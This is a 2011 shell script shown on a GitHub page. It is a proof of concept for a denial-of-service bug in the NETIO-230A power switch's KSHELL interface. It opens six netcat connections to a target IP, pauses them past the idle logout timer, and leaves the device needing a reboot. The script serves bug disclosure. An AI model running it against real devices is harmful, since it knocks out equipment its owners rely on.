-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathnetio-kshell-dos.sh
executable file
·52 lines (47 loc) · 1.43 KB
/
netio-kshell-dos.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#! /bin/sh
#
# Demonstration of a bug in the NETIO-230A KSHELL interface:
#
# Connections that are not closed properly prevent a reuse of this KSHELL
# instance. This can be used for a denial-of-service attack, but even during
# normal use network interruptions can trigger this bug.
#
# The bug is demonstrated by opening, but not closing, 6 KSHELL connections.
#
# A reboot of the NETIO-230A is needed to recover.
#
# Copyright (C) 2011 by Erik Auerswald [email protected]
#
# Copying and distribution of this file, with or without modification,
# are permitted in any medium without royalty provided the copyright
# notice and this notice are preserved. This file is offered as-is,
# without any warranty.
# the netcat utility (called 'nc') is needed
which nc > /dev/null || { echo "No 'nc' in \$PATH"; exit 1; }
test $# -eq 1 || { echo "Usage: $(basename $0) IP"; exit 1; }
IP=$1
# set K to the port number of the KSHELL process
K=1234
# set N to the maximum number of concurrent KSHELL connections
N=6
P=""
echo "Opening $N 'nc' connections to $IP"
for i in $(seq $N); do
nc $IP $K > /dev/null &
P="$P $!"
sleep 1
done
sleep 1
echo "Stopping 'nc' processes"
kill -19 $P
# set S to a number of seconds higher than the idle logout timer of KSHELL
S=121
echo "Sleeping $S seconds"
sleep $S
echo "Letting 'nc' processes continue"
kill -18 $P
echo "Killing 'nc' processes"
kill -15 $P
echo "Waiting for 'nc' processes to terminate"
wait
exit 0